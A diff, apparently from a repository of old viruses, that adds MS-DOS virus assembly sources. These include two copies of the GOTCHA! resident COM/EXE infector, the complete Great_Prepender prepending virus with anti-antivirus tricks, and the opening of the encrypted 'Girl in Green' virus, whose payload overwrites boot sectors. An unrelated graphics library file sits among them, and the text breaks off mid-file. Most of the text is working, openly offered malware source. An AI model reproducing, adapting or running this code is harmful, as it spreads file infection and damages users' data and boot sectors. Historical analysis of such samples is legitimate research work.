20h +COMSIGN equ 0 +EXESIGN equ 1 +MINTARGET equ 1000 +MAXTARGET equ -FILELEN + + .RADIX 16 + + +;**************************************************************************** +;* Start the program! +;**************************************************************************** + +begin: xor bx,bx + call install + int 20 + + +;**************************************************************************** +;* Data +;**************************************************************************** + +buffer db BUFLEN dup (?) +oi21 dw ?,? +oldlen dw ?,? +nameptr dw ?,? +handle dw ? +comexe db ? + + +;**************************************************************************** +;* File-extensions +;**************************************************************************** + +EXE_txt db 'EXE' +COM_txt db 'COM' + + +;**************************************************************************** +;* Interupt handler 24 +;**************************************************************************** + +ni24: mov al,03 + iret + + +;**************************************************************************** +;* Interupt handler 21 +;**************************************************************************** + +ni21: pushf + + cmp ax,0DADAh ;install-check ? + je do_DADA + + push dx + push cx + push bx + push ax + push si + push di + push ds + push es + + cmp ax,6C00h ;open/create 4.00 ? + je do_6C00 + cmp ah,56h ;rename ? + je doit + cmp ah,4Eh ;findfirst ? + je doit ;(only works without wildcards) + cmp ah,4Bh ;load / execute ? + je doit + cmp ah,43h ;attributes + je doit + cmp ah,41h ;delete ? + je doit ;(it might be un-deleted!) + cmp ah,3Dh ;open ? + je do_3D + + cmp ah,17h ;FCB-rename? + je doFCB + cmp ah,13h ;FCB-delete? + jne exit + +doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's! + +doit: call infect + +exit: pop es + pop ds + pop di + pop si + pop ax + pop bx + pop cx + pop dx + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + + +do_3D: test al,03h ;only if opened for READING + jne exit + jmp short doit + +do_6C00: test bl,03h ;idem + jne exit + mov dx,di ;ptr was DS:DI + jmp short doit + +do_DADA: mov ax,0A500h+VERSION ;return a signature + popf + iret + + +;**************************************************************************** +;* Old Interupt handler 21 +;**************************************************************************** + +org21: pushf + call dword ptr cs:[oi21] ;call to old int-handler + ret + + +;**************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov cs:[nameptr],dx ;save the ptr to the filename + mov cs:[nameptr+2],ds + + mov ah,62h ;get segment-adres of PSP + int 21 + mov ds,bx ;get seg-adres of environment + mov ax,ds:002Ch + mov ds,ax + mov si,0 + +envloop: cmp ds:[si],byte ptr 0 ;end of environment? + je verder7 + + push cs + pop es + mov di,offset envstring + mov bx,0 + +scloop: mov al,ds:[si] ;check the current env-item + cmpsb + je scv1 + inc bx ;characters don't match! +scv1: cmp al,0 ;end of env-item? + jne scloop + + cmp bx,0 ;did all characters match? + je return + jmp short envloop + +verder7: push cs ;check the filename + pop ds + les di,dword ptr [nameptr] + mov dx,di + mov cx,80 ;search end of filename (-EXT) + mov al,'.' + repnz scasb + mov bx,di + + std ;find begin of filename + mov cl,11 + mov al,'\' + repnz scasb + cld + je vvv + mov di,dx + jmp short vvv2 +vvv: add di,2 +vvv2: mov al,'V' ;is it V*.* ? + scasb + je return + + mov cl,7 ;is it *AN*.* ? + mov ax,'NA' +ANloop: dec di + scasw + loopnz ANloop + je return + + mov si,offset EXE_txt ;is extension 'EXE'? + mov di,bx + mov cx,3 + rep cmpsb + jnz verder4 + + mov byte ptr [comexe],EXESIGN + jmp short verder3 + +return: ret + +verder4: mov si,offset COM_txt ;is extension 'COM'? + mov di,bx + mov cx,3 + rep cmpsb + jnz return + + mov byte ptr [comexe],COMSIGN + +verder3: mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + xor dl,dl ;clear the flag + mov ax,3301h + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vec to new handler + pop ds + mov dx,offset ni24 + mov ax,2524h + int 21 + + lds dx,dword ptr [nameptr] ;get file-attribute + mov ax,4300h + call org21 + push cx + + and cx,0F8h ;clear READ-ONLY-flag + call setattr + jc return1_v + + push cs ;open the file + pop ds + lds dx,dword ptr [nameptr] + mov ax,3D02h + int 21 + jnc verder2 +return1_v: jmp return1 ;something went wrong... :-( + +verder2: push cs ;save handle + pop ds + mov [handle],ax + + mov bx,[handle] ;get file date & time + mov ax,5700h + int 21 + push cx + push dx + + call endptr ;get file-length + mov [oldlen],ax + mov [oldlen+2],dx + + sub ax,SIGNLEN ;move ptr to end - SIGNLEN + sbb dx,0 + mov cx,dx + mov dx,ax + mov al,00h + call ptrmov + + mov cx,SIGNLEN ;read the last bytes + mov dx,offset buffer + call flread + jc return2_v + + push cs ;compare bytes with signature + pop es + mov di,offset buffer + mov si,offset signature + mov cx,SIGNLEN + rep cmpsb + jz return2_v + + call beginptr ;read begin of file + mov cx,BUFLEN + mov dx,offset buffer + call flread + + cmp byte ptr [comexe],EXESIGN + jz do_exe + +do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file + jnb return2 + cmp word ptr [oldlen],MINTARGET + jbe return2 + + call writeprog ;write program to end of file + jc return2 + + mov ax,[oldlen] ;calculate new start-adres + add ax,(offset entry - 0103h) + mov byte ptr [buffer],0E9h ;'JMP' + mov word ptr [buffer+1],ax + + jmp short verder1 + +return2_v: jmp short return2 + + +do_exe: call writeprog ;write program to end of file + jc return2 + + mov ax,[oldlen] ;calculate new length + mov dx,[oldlen+2] + add ax,FILELEN + adc dx,0 + + mov cl,9 ;put new length in header + shr ax,cl + mov cl,7 + shl dx,cl + or ax,dx + inc ax + mov word ptr [buffer+4],ax + mov ax,[oldlen] + add ax,FILELEN + and ax,01FFh + mov word ptr [buffer+2],ax + + mov ax,[oldlen] ;calculate new CS & IP + mov dx,[oldlen+2] + mov bx,word ptr [buffer+8] + push ax + mov cl,4 + shr ax,cl + mov cl,0Ch + shl dx,cl + add ax,dx + sub ax,bx + mov word ptr [buffer+16h],ax ;put CS in header + pop ax + and ax,000Fh + add ax,(offset entry - 0100h) + mov word ptr [buffer+14h],ax ;put IP in header + +verder1: call beginptr ;write new begin of file + mov cx,BUFLEN + mov dx,offset buffer + call flwrite + +return2: mov bx,[handle] ;restore file date & time + pop dx + pop cx + mov ax,5701h + int 21 + + mov bx,[handle] ;close the file + mov ah,3Eh + int 21 + +return1: pop cx ;restore file-attribute + call setattr + + pop ds ;restore int24 vector + pop dx + mov ax,2524h + int 21 + + pop dx ;restore ctrl-break flag + mov ax,3301h + int 21 + + ret + + +;**************************************************************************** +;* Gets ASCIIZ-filename from FCB +;**************************************************************************** + +FCBtoASC: mov si,dx + lodsb + inc al ;extended FCB? + jne normal_FCB + add si,7 +normal_FCB: push cs + pop es + xor di,di ;adres for ASCIIZ-name + mov dx,di + mov cx,8 +FCB_loop: lodsb ;copy all except spaces + cmp al,' ' + je FCB_verder + stosb +FCB_verder: loop FCB_loop + mov al,'.' ;append a '.' + stosb + mov cl,3 ;and the extension + rep movsb + xchg ax,cx ;and a final zero. + stosb + push es + pop ds + ret + + +;**************************************************************************** +;* Changes file-attributes +;**************************************************************************** + +setattr: lds dx,dword ptr cs:[nameptr] + mov ax,4301h + call org21 + ret + + +;**************************************************************************** +;* Writes program to end of file +;**************************************************************************** + +writeprog: call endptr + mov cx,FILELEN + mov dx,offset begin +; call flwrite ;Hmm, save a few bytes! +; ret + + +;**************************************************************************** +;* Subroutines for reading/writing +;**************************************************************************** + +flwrite: mov ah,40h + jmp short flvrdr + +flread: mov ah,3Fh +flvrdr: push cs + pop ds + mov bx,cs:[handle] + int 21 + ret + + +;**************************************************************************** +;* Subroutines for file-pointer +;**************************************************************************** + +beginptr: mov al,00h ;go to begin of file + jmp short ptrvrdr + +endptr: mov al,02h ;go to end of file +ptrvrdr: xor cx,cx + xor dx,dx + +ptrmov: mov bx,cs:[handle] ;go somewhere + mov ah,42h + int 21 + ret + + +;**************************************************************************** +;* This is where infected files start +;**************************************************************************** + +entry: call entry2 +entry2: pop bx + sub bx,offset entry2 ;CS:BX is begin program - 100h + + pushf + cld + + cmp byte ptr cs:[bx+offset comexe],COMSIGN + jz entryC + +entryE: mov ax,ds ;put old start-adres on stack + add ax,10 + add ax,cs:[bx+offset buffer+016h] + push ax + push cs:[bx+offset buffer+014h] + + jmp short entcheck + +entryC: mov ax,bx ;restore old file-begin + add ax,offset buffer + mov si,ax + mov di,0100 + mov cx,BUFLEN + rep movsb + + push cs ;put old start-adres on stack + mov ax,0100h + push ax + +entcheck: mov ax,0DADAh ;already installed? + int 21h + cmp ah,0A5h + je entstop + + call install ;install the program + +entstop: iret + + +;**************************************************************************** +;* Install the program at top of memory +;**************************************************************************** + +install: push ds + push es + + xor ax,ax ;get original int21 vector + mov es,ax + mov cx,word ptr es:0084h + mov dx,word ptr es:0086h + mov cs:[bx+offset oi21],cx + mov cs:[bx+offset oi21+2],dx + + mov ax,ds ;adjust memory-size + dec ax + mov es,ax + cmp byte ptr es:[0000h],5Ah + jnz cancel + mov ax,es:[0003h] + sub ax,RESPAR + jb cancel + mov es:[0003h],ax + sub es:[0012h], word ptr RESPAR + + push cs ;copy program to top + pop ds + mov es,es:[0012h] + mov ax,bx + add ax,0100 + mov si,ax + mov di,0100h + mov cx,FILELEN + rep movsb + + mov dx,offset ni21 ;set vector to new handler + push es + pop ds + mov ax,2521h + int 21h + +cancel: pop es + pop ds + + ret + + +;**************************************************************************** +;* Text and Signature +;**************************************************************************** + +envstring: db 'E=mc',0 ;put this in your environment! + +signature: db 'GOTCHA!',0 ;I have got you! :-) +signend: + + + +end: + +cseg ends + end begin + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.gotcha9e.asm b/MSDOS/Virus.MSDOS.Unknown.gotcha9e.asm new file mode 100644 index 00000000..c2fbca9a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gotcha9e.asm @@ -0,0 +1,571 @@ +;**************************************************************************** +;* GOTCHA! Version 9e +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + org 100h + +SIGNLEN equ signend - signature +FILELEN equ end - begin +RESPAR equ (FILELEN/16) + 17 +VERSION equ 9 +BUFLEN equ 20h +COMSIGN equ 0 +EXESIGN equ 1 +MINTARGET equ 1000 +MAXTARGET equ -FILELEN + + .RADIX 16 + + +;**************************************************************************** +;* Start the program! +;**************************************************************************** + +begin: xor bx,bx + call install + int 20 + + +;**************************************************************************** +;* Data +;**************************************************************************** + +buffer db BUFLEN dup (?) +oi21 dw ?,? +oldlen dw ?,? +nameptr dw ?,? +handle dw ? +comexe db ? + + +;**************************************************************************** +;* File-extensions +;**************************************************************************** + +EXE_txt db 'EXE' +COM_txt db 'COM' + + +;**************************************************************************** +;* Interupt handler 24 +;**************************************************************************** + +ni24: mov al,03 + iret + + +;**************************************************************************** +;* Interupt handler 21 +;**************************************************************************** + +ni21: pushf + + cmp ax,0DADAh ;install-check ? + je do_DADA + + push dx + push cx + push bx + push ax + push si + push di + push ds + push es + + cmp ax,6C00h ;open/create 4.00 ? + je do_6C00 + cmp ah,56h ;rename ? + je doit + cmp ah,4Eh ;findfirst ? + je doit ;(only works without wildcards) + cmp ah,4Bh ;load / execute ? + je doit + cmp ah,43h ;attributes + je doit + cmp ah,41h ;delete ? + je doit ;(it might be un-deleted!) + cmp ah,3Dh ;open ? + je do_3D + + cmp ah,17h ;FCB-rename? + je doFCB + cmp ah,13h ;FCB-delete? + jne exit + +doFCB: call FCBtoASC ;COMMAND.COM still uses FCB's! + +doit: call infect + +exit: pop es + pop ds + pop di + pop si + pop ax + pop bx + pop cx + pop dx + popf + + jmp dword ptr cs:[oi21] ;call to old int-handler + + +do_3D: test al,03h ;only if opened for READING + jne exit + jmp short doit + +do_6C00: test bl,03h ;idem + jne exit + mov dx,di ;ptr was DS:DI + jmp short doit + +do_DADA: mov ax,0A500h+VERSION ;return a signature + popf + iret + + +;**************************************************************************** +;* Old Interupt handler 21 +;**************************************************************************** + +org21: pushf + call dword ptr cs:[oi21] ;call to old int-handler + ret + + +;**************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + mov cs:[nameptr],dx ;save the ptr to the filename + mov cs:[nameptr+2],ds + + mov ah,62h ;get segment-adres of PSP + int 21 + mov ds,bx ;get seg-adres of environment + mov ax,ds:002Ch + mov ds,ax + mov si,0 + +envloop: cmp ds:[si],byte ptr 0 ;end of environment? + je verder7 + + push cs + pop es + mov di,offset envstring + mov bx,0 + +scloop: mov al,ds:[si] ;check the current env-item + cmpsb + je scv1 + inc bx ;characters don't match! +scv1: cmp al,0 ;end of env-item? + jne scloop + + cmp bx,0 ;did all characters match? + je return + jmp short envloop + +verder7: push cs ;check the filename + pop ds + les di,dword ptr [nameptr] + mov dx,di + mov cx,80 ;search end of filename (-EXT) + mov al,'.' + repnz scasb + mov bx,di + + std ;find begin of filename + mov cl,11 + mov al,'\' + repnz scasb + cld + je vvv + mov di,dx + jmp short vvv2 +vvv: add di,2 +vvv2: mov al,'V' ;is it V*.* ? + scasb + je return + + mov cl,7 ;is it *AN*.* ? + mov ax,'NA' +ANloop: dec di + scasw + loopnz ANloop + je return + + mov si,offset EXE_txt ;is extension 'EXE'? + mov di,bx + mov cx,3 + rep cmpsb + jnz verder4 + + mov byte ptr [comexe],EXESIGN + jmp short verder3 + +return: ret + +verder4: mov si,offset COM_txt ;is extension 'COM'? + mov di,bx + mov cx,3 + rep cmpsb + jnz return + + mov byte ptr [comexe],COMSIGN + +verder3: mov ax,3300h ;get ctrl-break flag + int 21 + push dx + + xor dl,dl ;clear the flag + mov ax,3301h + int 21 + + mov ax,3524h ;get int24 vector + int 21 + push bx + push es + + push cs ;set int24 vec to new handler + pop ds + mov dx,offset ni24 + mov ax,2524h + int 21 + + lds dx,dword ptr [nameptr] ;get file-attribute + mov ax,4300h + call org21 + push cx + + and cx,0F8h ;clear READ-ONLY-flag + call setattr + jc return1_v + + push cs ;open the file + pop ds + lds dx,dword ptr [nameptr] + mov ax,3D02h + int 21 + jnc verder2 +return1_v: jmp return1 ;something went wrong... :-( + +verder2: push cs ;save handle + pop ds + mov [handle],ax + + mov bx,[handle] ;get file date & time + mov ax,5700h + int 21 + push cx + push dx + + call endptr ;get file-length + mov [oldlen],ax + mov [oldlen+2],dx + + sub ax,SIGNLEN ;move ptr to end - SIGNLEN + sbb dx,0 + mov cx,dx + mov dx,ax + mov al,00h + call ptrmov + + mov cx,SIGNLEN ;read the last bytes + mov dx,offset buffer + call flread + jc return2_v + + push cs ;compare bytes with signature + pop es + mov di,offset buffer + mov si,offset signature + mov cx,SIGNLEN + rep cmpsb + jz return2_v + + call beginptr ;read begin of file + mov cx,BUFLEN + mov dx,offset buffer + call flread + + cmp byte ptr [comexe],EXESIGN + jz do_exe + +do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file + jnb return2 + cmp word ptr [oldlen],MINTARGET + jbe return2 + + call writeprog ;write program to end of file + jc return2 + + mov ax,[oldlen] ;calculate new start-adres + add ax,(offset entry - 0103h) + mov byte ptr [buffer],0E9h ;'JMP' + mov word ptr [buffer+1],ax + + jmp short verder1 + +return2_v: jmp short return2 + + +do_exe: call writeprog ;write program to end of file + jc return2 + + mov ax,[oldlen] ;calculate new length + mov dx,[oldlen+2] + add ax,FILELEN + adc dx,0 + + mov cl,9 ;put new length in header + shr ax,cl + mov cl,7 + shl dx,cl + or ax,dx + inc ax + mov word ptr [buffer+4],ax + mov ax,[oldlen] + add ax,FILELEN + and ax,01FFh + mov word ptr [buffer+2],ax + + mov ax,[oldlen] ;calculate new CS & IP + mov dx,[oldlen+2] + mov bx,word ptr [buffer+8] + push ax + mov cl,4 + shr ax,cl + mov cl,0Ch + shl dx,cl + add ax,dx + sub ax,bx + mov word ptr [buffer+16h],ax ;put CS in header + pop ax + and ax,000Fh + add ax,(offset entry - 0100h) + mov word ptr [buffer+14h],ax ;put IP in header + +verder1: call beginptr ;write new begin of file + mov cx,BUFLEN + mov dx,offset buffer + call flwrite + +return2: mov bx,[handle] ;restore file date & time + pop dx + pop cx + mov ax,5701h + int 21 + + mov bx,[handle] ;close the file + mov ah,3Eh + int 21 + +return1: pop cx ;restore file-attribute + call setattr + + pop ds ;restore int24 vector + pop dx + mov ax,2524h + int 21 + + pop dx ;restore ctrl-break flag + mov ax,3301h + int 21 + + ret + + +;**************************************************************************** +;* Gets ASCIIZ-filename from FCB +;**************************************************************************** + +FCBtoASC: mov si,dx + lodsb + inc al ;extended FCB? + jne normal_FCB + add si,7 +normal_FCB: push cs + pop es + xor di,di ;adres for ASCIIZ-name + mov dx,di + mov cx,8 +FCB_loop: lodsb ;copy all except spaces + cmp al,' ' + je FCB_verder + stosb +FCB_verder: loop FCB_loop + mov al,'.' ;append a '.' + stosb + mov cl,3 ;and the extension + rep movsb + xchg ax,cx ;and a final zero. + stosb + push es + pop ds + ret + + +;**************************************************************************** +;* Changes file-attributes +;**************************************************************************** + +setattr: lds dx,dword ptr cs:[nameptr] + mov ax,4301h + call org21 + ret + + +;**************************************************************************** +;* Writes program to end of file +;**************************************************************************** + +writeprog: call endptr + mov cx,FILELEN + mov dx,offset begin +; call flwrite ;Hmm, save a few bytes! +; ret + + +;**************************************************************************** +;* Subroutines for reading/writing +;**************************************************************************** + +flwrite: mov ah,40h + jmp short flvrdr + +flread: mov ah,3Fh +flvrdr: push cs + pop ds + mov bx,cs:[handle] + int 21 + ret + + +;**************************************************************************** +;* Subroutines for file-pointer +;**************************************************************************** + +beginptr: mov al,00h ;go to begin of file + jmp short ptrvrdr + +endptr: mov al,02h ;go to end of file +ptrvrdr: xor cx,cx + xor dx,dx + +ptrmov: mov bx,cs:[handle] ;go somewhere + mov ah,42h + int 21 + ret + + +;**************************************************************************** +;* This is where infected files start +;**************************************************************************** + +entry: call entry2 +entry2: pop bx + sub bx,offset entry2 ;CS:BX is begin program - 100h + + pushf + cld + + cmp byte ptr cs:[bx+offset comexe],COMSIGN + jz entryC + +entryE: mov ax,ds ;put old start-adres on stack + add ax,10 + add ax,cs:[bx+offset buffer+016h] + push ax + push cs:[bx+offset buffer+014h] + + jmp short entcheck + +entryC: mov ax,bx ;restore old file-begin + add ax,offset buffer + mov si,ax + mov di,0100 + mov cx,BUFLEN + rep movsb + + push cs ;put old start-adres on stack + mov ax,0100h + push ax + +entcheck: mov ax,0DADAh ;already installed? + int 21h + cmp ah,0A5h + je entstop + + call install ;install the program + +entstop: iret + + +;**************************************************************************** +;* Install the program at top of memory +;**************************************************************************** + +install: push ds + push es + + xor ax,ax ;get original int21 vector + mov es,ax + mov cx,word ptr es:0084h + mov dx,word ptr es:0086h + mov cs:[bx+offset oi21],cx + mov cs:[bx+offset oi21+2],dx + + mov ax,ds ;adjust memory-size + dec ax + mov es,ax + cmp byte ptr es:[0000h],5Ah + jnz cancel + mov ax,es:[0003h] + sub ax,RESPAR + jb cancel + mov es:[0003h],ax + sub es:[0012h], word ptr RESPAR + + push cs ;copy program to top + pop ds + mov es,es:[0012h] + mov ax,bx + add ax,0100 + mov si,ax + mov di,0100h + mov cx,FILELEN + rep movsb + + mov dx,offset ni21 ;set vector to new handler + push es + pop ds + mov ax,2521h + int 21h + +cancel: pop es + pop ds + + ret + + +;**************************************************************************** +;* Text and Signature +;**************************************************************************** + +envstring: db 'E=mc',0 ;put this in your environment! + +signature: db 'GOTCHA!',0 ;I have got you! :-) +signend: + + + +end: + +cseg ends + end begin + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.graflib.asm b/MSDOS/Virus.MSDOS.Unknown.graflib.asm new file mode 100644 index 00000000..b11f9911 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.graflib.asm @@ -0,0 +1,93 @@ +; +; grafix --- graflib.asm +; +; miscellaneous assembly routines +; +; Written 4/87 by Scott Snyder (ssnyder@romeo.caltech.edu or @citromeo.bitnet) +; +; Modified 5/29/87 by sss to allow for different memory models +; + + title graflib + +include macros.ah + +buflen equ 32768 + +sseg +endss + +dseg +endds + +buf segment public 'BUF' + db buflen dup(?) +buf ends + +cseg _graflib + +pBegin g_bufseg + + mov ax, buf + ret + +pEnd g_bufseg + +pBegin g_fmemcpy + + push bp + mov bp,sp + push di + push si + push ds + + cld + les di,[bp+argbase] + lds si,[bp+argbase+4] + mov cx,[bp+argbase+8] + shr cx, 1 + jnc c1 + movsb +c1: rep movsw + + pop ds + pop si + pop di + mov sp,bp + pop bp + ret + +pEnd g_fmemcpy + +pBegin g_fmemset + + push bp + mov bp,sp + push di + push si + + cld + les di,[bp+argbase] + mov al,[bp+argbase+4] + mov ah,al + mov cx,[bp+argbase+6] + shr cx,1 + jnc s1 + stosb +s1: rep stosw + + pop si + pop di + mov sp,bp + pop bp + ret + +pEnd g_fmemset + + df_ g_fmemcpy + df_ g_fmemset + df_ g_bufseg + +endcs _graflib + + end diff --git a/MSDOS/Virus.MSDOS.Unknown.greatpre.asm b/MSDOS/Virus.MSDOS.Unknown.greatpre.asm new file mode 100644 index 00000000..59844c19 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.greatpre.asm @@ -0,0 +1,183 @@ +;****************************************************************************** +; +; "I'm the great prepender!" - Jest on Queen by Rajaat / Genesis +; +;****************************************************************************** +; +; Virus name : Great_Prepender +; Author : Rajaat +; Origin : United Kingdom, December 1995 +; Compiling : Using TASM | Using A86 +; | +; TASM /M PREPEND | A86 PREPEND.ASM +; TLINK /T PREPEND | +; Targets : COM files +; Size : 144 bytes +; Resident : No +; Polymorphic : No +; Encrypted : No +; Stealth : No +; Tunneling : No - is not needed for some programs +; Retrovirus : Yes - TBAV, SUSPICIOUS, F-PROT & VSAFE +; Antiheuristics: Yes - TBAV, SUSPICIOUS & F-PROT +; Peculiarities : Shifts the whole file after the virus code +; Rewrites the whole file for infection +; Avoids TBAV & SUSPICIOUS using a 2 byte signature +; Drawbacks : Hangs if host is TSR program +; Hangs if host jumps to PSP:0 +; Needs at least 64k free space after host +; Behaviour : When a COM file infected with Great_Prepender virus is +; executed, the virus will search for a COM file in the +; current directory that doesn't have a 0 in the seconds +; field of the file date/time. The virus will read the entire +; file in a block after the current host. Great_Prepender now +; creates a new file with the same name and writes itself at +; the start of the file, and appends the rest of the host +; behind it's own code, thus effectively shifting the whole +; host with 144 bytes. The virus will restore the host in a +; very peculiar way. It modifies the segment registers in a +; way that the host looks if it's aligned at 100h, the normal +; address for COM files to start. It then copies most of the +; DTA over it's own code and executes the host. The stack +; segment is not modified. Because the virus shifts only the +; DTA and doesn't change the memory allocation, resident +; programs have a chance of crashing, because they don't +; allocate 144 bytes of their own code (if function 31h is +; used for the allocation). Great_Prepender is targetted at +; a few resident behaviour blockers, effectively avoiding them. +; The virus also has some tricks to avoid being scanned by a +; few antivirus programs that can perform heuristic scanning. +; It's unknown what this virus might do besides replicate :) +;****************************************************************************** +; +; Results with antivirus software +; +; TBFILE - doesn't trigger +; TBSCAN - flags 'p' (packed file) +; TBCLEAN - can't reconstruct without ANTIVIR.DAT +; SVS - doesn't trigger +; SSC - no flags +; F-PROT - no virus found +; F-PROT /ANALYSE - no virus found +; F-PROT /ANALYSE /PARANOID - unusual code +; AVP - virus type Com suspicion (0 bytes) +; VSAFE - doesn't trigger +; NEMESIS - triggers :( +; +;****************************************************************************** +; +; Big hello to : Immortal Riot, VLAD, Phalcon/Skism and everyone on #virus who +; deserves it to be greeted by me. +; +;****************************************************************************** + +.model tiny +.code + + org 100h + +dta equ 0fd00h-1eh + +;===( Main part of the virus )================================================= +im_the_great_prepender: + push ax ; fool TBSCAN and SSC + dec bx + + xchg ax,cx + mov ah,1ah + mov dx,dta + int 21h ; move dta to end of segment + + mov ah,4eh +find_next: lea dx,filemask + int 21h ; search COM file + jc restore_host ; go restore_host if seek fails + + mov ah,4fh + test byte ptr ds:dta+16h,00011111b + jz find_next ; if seconds != 0 go find_next + +;===( Infect file )============================================================ + + mov ah,3dh + mov dx,dta+1eh + int 21h ; open file with read access + + xchg ax,bx + xchg ax,cx + push ds + pop ax + add ah,10h + push ax + push ax + pop ds + mov ah,3fh + cwd ; read whole file in next + int 21h ; 64k block + push ax ; store file size + push cs + pop ds + mov ah,3eh + int 21h ; close file + + mov ah,3ch + mov dh,0fdh + inc cx + int 21h ; create new file (overwrite) + + mov ah,40h + mov dh,01h + mov cl,virus_size + int 21h ; write virus + + mov ah,40h + pop cx + pop ds + cwd + int 21h ; write host + + push cs + pop ds + + mov ax,5701h + mov cx,word ptr ds:dta+16h + mov dx,word ptr ds:dta+18h + and cl,11100000b ; set seconds to 0 and + int 21h ; restore date/time + + mov ah,3eh + int 21h ; close file + +;===( Return to host )========================================================= +restore_host: push cs ; shift the segment + pop si ; and prepare for dta + add si,09h ; transfer. + push si + push si + mov di,100h-(virus_end-reconstruct) + mov cx,di + push di + push si + pop es + xor si,si + mov di,si + mov dx,80h + retf ; jump to new cs:ip (shifted) + +filemask db '*Rajaat.COM',0 ; file mask and author name + +reconstruct: rep movsb ; copy dta to new location + pop ds ; (over virus code) + mov ah,1ah + int 21h ; set new dta + pop ax ; clear ax + +virus_end equ $ +virus_size equ $-im_the_great_prepender + +;===( Original shifted host )================================================== + + mov ax,4c00h + int 21h + +end im_the_great_prepender diff --git a/MSDOS/Virus.MSDOS.Unknown.green.asm b/MSDOS/Virus.MSDOS.Unknown.green.asm new file mode 100644 index 00000000..b12941bc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.green.asm @@ -0,0 +1,673 @@ +GREEN_GIRL SEGMENT +; +; The "Girl in Green" Virus by The Methyl-Lated Spirit +; +; Alright, here is the low-down on this virus. +; - XOR and NOT encryption +; - Boot block message display +; - .EXE and .COM infection +; - Direct Action +; - INT 042H Handler +; - Teensy weensy little bit of anti-debugging shit +; - Neat activation +; - Directory Traversal +; - Restores original Date/Time/Attributes +; - Won't infect Windows .EXE's +; - Won't fuck up too often because of extensive testing of it +; +; A short note on the boot block: +; +; This virus has a boot block, yes, thats right, a boot block! +; On July the 3rd, MY birthday, it will capture a picture of the first +; sector of the disk in A: into a file on the A: called boot.sec, then +; it will overwrite the original bootblock with some code, and when you +; re-boot onto that disk... well, I'll let you see yourself . It was made originally for EGA, but should +; work on other monitors too, although the colours may be weird. +; +; Basically, there is no easy way to go through this virus. It is +; a great desendant from Spaghetti . It jumps here, there +; everywhere, and, well, I don't believe I've created such a monster. +; Here is a little look see at it. It goes through 2 phases determined +; by the run_count counter. A setting of 1 means it is the first time through +; and that it should look for .EXE files to infect. After that, it is set to +; 2 and it searches for .COM files to infect. It will only infect 1 file on +; each run. After that, when it goes to restart the host, it looks at the +; com_or_exe variable. A setting of 1 means the current file is a .EXE and +; should be restored in that way, and a setting of 2 means the current file +; is a .COM file and should be restored as such. These variables are +; temporarily changed while writing the virus to a new file to reflect +; the hosts new attributes. +; +; Dedications: +; - The knock-out babe on the 424 bus home from school every day +; +; Big time fuck you's to: +; - Peter Doyle. FACE IT! COMPUSERVE SUX! +; - Dick Smith's Shops. HAHAHAHA, THE TOILET BOWL VIRUS STRIKES AGAIN! +; - MYER stores in Perth +; "If you do not remove yourself from that computer, I +; shall have to call security". HAHAHAHAHAHAHAHAHAHA +; - Deth : MYER was fun, but you are a liar and a theif, FUCK YOU +; : You don't NARK on people you did a B&E with just because +; : you're having PMS, get a life arsehole. Liquid Plastic SUX. +; +; Greets to: +; - Ral : Techno roqs just about as much as Jim Morrison +; - Grey : Thanx for the chats dude +; - Rainbow Bright/Telco Ray : Haven't seen u on the net laterly! +; - Shalazar : What is there to say? You're a dude. +; - Titanium Warrior : I'm gunna get you! +; - And all those wonderfull people in GrayLands that gave me this nice +; padded cell so I wouldn't bang my head to hard on the walls +; when I got frustrated debugging this thing :) +; +; Sources: +; - Much code from my first virus, The Toilet Bowl +; - VLAD, the info on how to check for WinEXE files +; - 40-hex article by Dark Avenger on .EXE infections +; - 40-hex article on how boot-sectors work +; +; Reasons for writing it: +; If you're wondering why this is called the "Girl in Green" virus, well, here +; is the answer. I am Methyl, hanging on #AUSSIES alot, and I met a +; BEAUTIFUL girl on da bus, and she was dressed in her green school uniform. +; Well, I'm, of course, gunna ask her out when I get sum guts, but first +; I thought I'd be really kind and create a virus to show my love for her! :> +; +; So if you were wearing a slazenger suit into +; Karrinyup on Mothers Day, and a phreak in white with the wierdest +; pair of jeans in the world on came up to you and said "Hello", then, +; I LOVE YOU! + ; + ORG 0H ; + ; +START: ; Host file + MOV AH,4CH ; + INT 21H ; + ; +BEGIN: ; + MOV AH,1 ; TbAV will go no further :) + INT 016H ; + ; + JMP $+3 ; Stop F-PROT flagging this as a virus + DB 081H, 0E8H, 00H, 00H ; + ; +GET_DELTA: ; + MOV BP,SP ; + SUB WORD PTR [SS:BP], OFFSET GET_DELTA + MOV AX,[SS:BP] ; + ADD SP,2 ; + MOV BP,AX ; + ; + PUSH DS ; Save PSP segment + PUSH ES ; + MOV DS,CS ; Make ES=DS=CS + MOV ES,DS ; + ; +; I've done a little thing here that makes this baby easier to compile. +; When first compiled, the variable enc_or_not will equal 0, and so the +; encrypting routines shan't be run, because the virus has not yet encrypted +; itself. After the first run, this value is changed forever to be 1, so that +; encryption is always carried out on the new infected files. It takes up a +; bit of space, but, like I said, easier to compile. + ; + ; + CMP BYTE PTR [OFFSET ENC_OR_NOT+BP], 0 + JE START_XOR ; + ; Call encryption routines + CALL NOTTER ; + CALL XORER ; + ; +START_XOR: ; Begin XOR'ing here + MOV BYTE PTR [OFFSET ENC_OR_NOT+BP], 1 + ; Determine which method will be used later + ; to jump back to host, and restores the + ; appropriate host bytes. + CMP BYTE PTR [OFFSET COM_OR_EXE+BP], 1 + JE EXE_BYTES ; + ; This will restore .COM files + LEA SI,[OFFSET ORIG_3+BP] + MOV DI,0100H ; + MOVSB ; + MOVSB ; + MOVSB ; + JMP RESET ; + ; +EXE_BYTES: ; This is for .EXE's + 